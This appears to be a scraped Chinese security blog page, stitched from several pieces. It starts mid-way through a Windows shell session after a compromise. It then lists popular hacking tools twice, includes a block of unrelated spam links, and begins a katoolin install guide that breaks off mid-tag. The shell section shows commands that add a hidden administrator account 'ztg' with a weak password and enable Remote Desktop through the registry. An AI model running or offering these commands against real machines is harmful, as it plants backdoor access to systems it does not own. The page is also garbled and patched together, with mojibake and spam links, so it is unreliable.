TCP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">127.0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1026</span>         <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>            LISTENING
TCP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.135</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">139</span>    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>            LISTENING
TCP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.135</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1031</span>   <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.133</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span>      ESTABLISHED
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">445</span>            *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">500</span>            *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">4500</span>         *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">127.0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">123</span>          *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">127.0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1025</span>         *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">127.0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">0</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1900</span>         *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.135</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">123</span>    *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.135</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">137</span>    *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.135</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">138</span>    *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  
UDP    <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.135</span><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:</span><span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">1900</span>   *<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">:*</span>                  

<span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">C:</span>\WINDOWS\system32&gt;ipconfig -all
ipconfig -all

Windows IP Configuration

      Host Name . . . . . . . . . . . . : dflx
      Primary Dns Suffix. . . . . . . :
      Node Type . . . . . . . . . . . . : Unknown
      IP Routing Enabled. . . . . . . . : No
      WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter 锟斤拷锟斤拷锟斤拷锟斤拷:

      Connection-specific DNS Suffix. :
      Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
      Physical Address. . . . . . . . . : <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">00</span>-0C-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">29</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">04</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">23</span>-<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">53</span>
      Dhcp Enabled. . . . . . . . . . . : No
      IP Address. . . . . . . . . . . . : <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">192.168</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">201.135</span>
      Subnet Mask . . . . . . . . . . . : <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">255.255</span>.<span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">255.0</span>
      Default Gateway . . . . . . . . . :

</code></pre><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;"><strong>进入windows界面,dos大神可以畅通无阻了,不过如果喜欢windows界面,可以安装上面的方法,进行操作,在远程桌面。</strong></p></blockquote><pre class="hljs undefined" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="C:\WINDOWS\system32>net hljs dockerfile" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">net <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">user</span> ztg <span class="hljs-number" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">123456</span> /<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">add</span><span class="bash" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity;">
</span></code></pre><p style="margin: 10px auto; text-align: justify;"><strong>添加一个用户名为ztg,密码123456</strong></p><pre class="hljs undefined" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="hljs avrasm" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-symbol" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 176, 232);">C:</span>\WINDOWS\system32&gt;net localgroup administrators ztg /<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">add</span>
net localgroup administrators ztg /<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">add</span>
</code></pre><p style="margin: 10px auto; text-align: justify;"><strong>把ztg添加到管理员用户组</strong></p><pre class="hljs bash" highlighted="true" style="padding: 5px; transition-duration: 0.2s; transition-property: color, opacity; overflow: auto; background: rgb(245, 245, 245); font-family: &quot;Courier New&quot;, sans-serif; border: 1px solid rgb(204, 204, 204); border-radius: 3px;"><code class="bash hljs" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">C:\WINDOWS\system32&gt;REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal<span class="hljs-string" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">" "</span>Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal<span class="hljs-string" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(163, 21, 21);">" "</span>Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
</code></pre><p style="margin: 10px auto; text-align: justify;"><strong>是手动开启3389(远程桌面连接端口)</strong></p></div><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">1. METASPLOIT</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">在应对网络渗透问题时,MetaSploit非常好用。因为MetaSploit是目前最先进的黑客工具之一,它拥有一整套先进的渗透测试工具。该工具主要面向的是Linux操作系统,但也有Windows和Mac版本。</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">2. NMAP</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">NMAP,全名Network Mapper,是一个功能强大的开源工具,主要用于网络安全审计和网络搜寻。目前,该工具被广泛应用于查找有关目标网络和服务器设备的信息以及其他网络漏洞信息。大多数网络管理员将其用于网络清单、管理服务升级计划以及监控主机或服务正常运行等任务。Nmap适用于Linux、Windows和Mac。</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">3. NESSUS</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">NESSUS,全名Remote Security Scanner(远程安全扫描程序),是一款主要用于漏洞扫描的远程安全扫描工具。它是全球超过75,000家组织中最受欢迎的漏洞扫描程序。到现在为止,世界上已有越来越多的组织意识到了Nessus在审核关键业务、企业设备和应用程序上的巨大作用。</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">4. WIRESHARK</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">Wireshark是一个免费的开源数据包分析器。它主要用于网络故障排除、分析和软件及通信协议的开发。最为关键的一点是,该工具允许使用者捕获和交互式浏览网络帧的内容,该功能使它成为了最受欢迎的黑客工具之一。Wireshark适用于Linux和Windows操作系统。</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">5.Social-Engineer Toolkit</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">Social-Engineer Toolkit(社会工程师工具包)是一款基于Python的社交工程渗透测试高级框架。它提供了制作多种类型社会工程攻击的组件,如凭据获取、鱼叉式网络钓鱼攻击、短信欺骗、网络钓鱼电子邮件等等。目前,Social-Engineer Toolkit仅适用于Linux系统。</span></p><p style="margin: 10px auto; text-align: justify;"><span class="bjh-p">--------------------------</span></p><p style="margin: 10px auto; text-align: justify;">1. Nmap</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">Nmap(Network Mapper)是一款非常著名的、用来扫描端口和绘制网络的、开源免费的黑客工具,它是一个基于控制台的工具,另外方便使用,还有一个带有GUI的版本Zenmap。Nmap被世界各地的安全专业人员用于绘制网络空间,检查开放的端口,管理服务的升级计划,监控主机或服务的正常运行时间。</p><p style="margin: 10px auto; text-align: justify;">nmap主要用于网络发现和执行安全审计。它使用原始IP数据包以创造性的方式来确定哪些主机在网络上可用,收集主机提供了哪些服务及其相关信息(应用程序名称和版本),使用的是什么操作系统,目标主机的过滤器/防火墙允许什么类型、什么版本的数据包穿过。</p><p style="margin: 10px auto; text-align: justify;">2. Metasploit</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">Metasploit是一个漏洞利用工具,可以用来执行各种各样的任务,它是网络安全专业人员和白帽黑客必不可少的工具。同时它是最著名的一个开源框架,可用于开发和执行针对远程目标机器的POC的工具。Metasploit本质上是为用户提供关于已知的安全漏洞的关键信息,帮助制定渗透测试、系统测试计划、漏洞利用的策略和方法。</p><p style="margin: 10px auto; text-align: justify;">3. John the Ripper</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">John the Ripper是一个受欢迎的密码破解渗透测试工具,最常用于进行字典攻击。John the Ripper以文本字符串的样本(也称为“字典表”,包括常用和复杂的组合密码)为基础,并以与待破解密码同样的方式(包括加密算法和密钥)进行加密,并输出加密字符串,与真正密码进行比较。该工具还可以用于对字典库进行各种变形。</p><p style="margin: 10px auto; text-align: justify;">另一个和John the Ripper类似的工具是THC Hydra(九头蛇)。John the Ripper和THC之间唯一的区别是,John the Ripper是一个离线的密码破解器,而九头蛇是一个“在线”的破解工具。</p><p style="margin: 10px auto; text-align: justify;">4. THC Hydra</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">THC Hydra是一个非常受欢迎的密码破解工具,并且有一个非常活跃和经验丰富的开发团队在维护,支持Windows,Linux,Free BSD,Solaris和OS X等操作系统。THC Hydra是一个快速稳定的网络登录攻击工具,它将使用字典或暴力攻击来尝试针对登录页面的各种密码和登录组合。当你需要强力破解远程认证服务时,THC Hydra常常是个不二选择工具。它可以对超过50个协议执行高效的字典攻击,包括telnet、FTP、HTTP、HTTPS、SMB、多种类型的数据库,等等。您可以轻松添加模块到该工具中,以此增强功能。</p><p style="margin: 10px auto; text-align: justify;">5. OWASP Zed</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">OWASP Zed代理攻击(简称:ZAP)是一个非常流行的Web应用程序渗透测试工具,用于发现应用漏洞。它既可以被具有丰富经验的安全专家所用,同时对于开发人员和功能测试人员来说也是非常理想的测试工具箱。</p><p style="margin: 10px auto; text-align: justify;">ZAP是一个流行的工具,因为它也有很多的支持者,并且OWASP社区也是一个为那些网络安全工作人员提供优秀资源的社区。ZAP提供自动扫描器以及其他各种工具,用于发现安全漏洞。理解和精通这个工具有利于你在渗透测试领域的职业生涯提升。</p><p style="margin: 10px auto; text-align: justify;">6. Wireshark</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">Wireshark是一个非常流行的网络协议分析器工具,它可以用于检查办公网络或家庭网络中的各种东西。您可以实时捕获数据包并分析数据包以找到与网络相关的各种信息。该工具支持Windows,Linux,OS X,Solaris,FreeBSD和其他平台。</p><p style="margin: 10px auto; text-align: justify;">Wireshark已经高度发达,它包括过滤器,彩色标注等细节功能,让用户深入了解网络流量和检查每个数据包。如果你想成为一个渗透测试相关工作或者作为一个网络安全从业者,学习如何使用Wireshark是必不可缺的。</p><p style="margin: 10px auto; text-align: justify;">7. Aircrack-ng</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">Aircrack-ng是一个无线攻击工具,其之所有上榜是因为它具有强有力的无线网络密码的破解能力。这是一个用于802.11协议簇中WEP协议和WPA-PSK协议的密钥破解工具,它只要在监控模式下抓取足够的数据包,就可以恢复密钥。我们知道aircrack-ng提供标准的FMS攻击和优化了的Korek攻击,结合PTW攻击可使他们的攻击更有效。对于那些对无线攻击感兴趣的人来说,这是一个强烈推荐的工具。无线审计和渗透测试,学习Aircrack是必不可少的。</p><p style="margin: 10px auto; text-align: justify;">8. Maltego</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">Maltego是数字取证工具,为企业网络或局域网络提供一个整体的网络运行情况和网络威胁画像。Maltego核心功能是分析真实世界中可触及的公开互联网信息之间的关系,包括“踩点”互联网基础设施以及收集拥有这些设施的企业组织和个人信息。</p><p style="margin: 10px auto; text-align: justify;">Maltego提供一个范围广泛的图形化界面,通过聚合信息可即时准确地看到各个对象之间的关系,这使得我们可以看到隐藏的关联,即使它们是三重或四重的分离关系。</p><p style="margin: 10px auto; text-align: justify;">9. Cain and Abel</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">Cain&amp;Abel是微软操作系统的密码复原工具,通过嗅探网络它可轻易地复原各种密码,使用字典、暴力、密码分析破解加密密码,记录VoIP通话记录,解码加密的密码,恢复无线网络密钥,发现缓存密码、分析路由协议。</p><p style="margin: 10px auto; text-align: justify;">开发Cain&amp;Abel的本意,是希望它能对网络管理员、教师、安全顾问/专业人员、法医工作人员、安全软件供应商、专业渗透测试人员等提供帮助。</p><p style="margin: 10px auto; text-align: justify;">10. Nikto Website Vulnerability Scanner</p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><p style="margin: 10px auto; text-align: justify;">Nikto是另一个经典的黑客工具,它是一个开源的(GPL)Web服务器扫描工具,综合扫描web服务器中的潜在危险的文件、CGI、版本检查、特定版本的问题、服务器配置项。被扫描项目和插件可以进行自动更新。</p><p style="margin: 10px auto; text-align: justify;">Nikto也可以检查服务器配置项,比如多索引文件的存在,HTTP服务选项,该工具还可标识已安装的Web服务器和Web应用程序。Nikto也算是半个IDS工具了,所以它是在进行白帽渗透测试或白盒渗透测试时是非常有用的。</p><p style="margin: 10px auto; text-align: justify;">黑客工具也不仅限于以上讨论的那些,不同个人或团队都有不同的偏好。然而,这些都是被专业人士推荐的最受欢迎的工具。而且,所有这些工具都被集成在用于渗透测试的Linux发行版,如Kali Linux或BackBox系统,因此大家都极力推荐你安装一个合适的、能够自动更新工具库的、集成众多黑客工具的Linux工具箱了。</p><p style="margin: 10px auto; text-align: justify;">http://www.lnluqu.cn/<br>http://www.025invest.cn/<br>http://www.wx-detian.cn/<br>http://www.xintravel.cn/<br>http://www.fenghuicaifu.cn/<br>http://www.chinaytbzw.cn/<br>http://www.sydire.cn/<br>http://www.jnymkj.cn/<br>http://www.metrel-china.cn/<br>http://www.hongheqiche.cn/<br>http://www.zazhiku.cn/<br>http://www.yz-hysl.cn/<br>http://www.gutiangelun.cn/<br>http://www.lnjjpm.cn/<br>http://www.touraround.cn/<br>---------------------<br><br></p><p style="margin: 10px auto; text-align: justify;">在真实<a href="http://www.52bug.cn/sec" target="_blank" style="color: rgb(0, 0, 0);">渗透</a>环境下往往需要一个稳定、安全、可随时操作的环境,家中的电脑不能一直开着,而且还有解决公网IP的问题,这时候我们往往需要一台vps,但是市面上的vps往往并不支持安装kali系统,只有某些较贵的KVM构架vps可以不太稳定的安装kali系统,其他linux系统支持的<a href="http://www.52bug.cn/sec" target="_blank" style="color: rgb(0, 0, 0);">渗透</a>测试软体也并不全面,于是今天我为大家介绍一款可以直接在常见Ubuntu设备上安装全部kali工具集的程序katoolin。</p><h2 style="margin-top: 10px; margin-bottom: 10px; font-size: 21px; color: rgb(3, 120, 187); line-height: 3em;">安装:</h2><p style="margin: 10px auto; text-align: justify;">首先确保你的Python版本大于2.7</p><p style="margin: 10px auto; text-align: justify;">python --version</p><p style="margin: 10px auto; text-align: justify;">安装git</p><p style="margin: 10px auto; text-align: justify;">apt-<span class="hljs-keyword" style="color: rgb(0, 0, 255);">get install git</span></p><p style="margin: 10px auto; text-align: justify;">然后便开始安装</p><p style="margin: 10px auto; text-align: justify;"><span class="hljs-attribute" style="color: rgb(163, 21, 21);">sudo su</span></p><p style="margin: 10px auto; text-align: justify;">git clone https://github.com/LionSec/katoolin.git &amp;&amp; cp katoolin/katoolin.py /usr/bin/katoolin</p><p style="margin: 10px auto; text-align: justify;">chmod +x /usr/bin/katoolin&nbsp;<span class="hljs-comment" style="color: rgb(0, 128, 0);">#给予权限</span></p><p style="margin: 10px auto; text-align: justify;"><span class="hljs-comment" style="color: rgb(0, 128, 0);">sudo katoolin #打开katoolin</span></p><p style="margin: 10px auto; text-align: justify;"><img src="http://image.3001.net/images/20171205/1512423475548.jpg!small" alt="5a010998b6d74.jpg" width="690" data-original="http://image.3001.net/images/20171205/1512423475548.jpg!small" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p><p style="margin: 10px auto; text-align: justify;">之后输入</p><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;">1查看软件库</p><p style="margin: 10px auto; text-align: justify;">2查看软件分类</p><p style="margin: 10px auto; text-align: justify;">3安装经典菜单通知</p><p style="margin: 10px auto; text-align: justify;">4安装kali菜单</p><p style="margin: 10px auto; text-align: justify;">5帮助</p></blockquote><p style="margin: 10px auto; text-align: justify;">我们先输入1查看软件库</p><p style="margin: 10px auto; text-align: justify;"><a class="highslide-image" 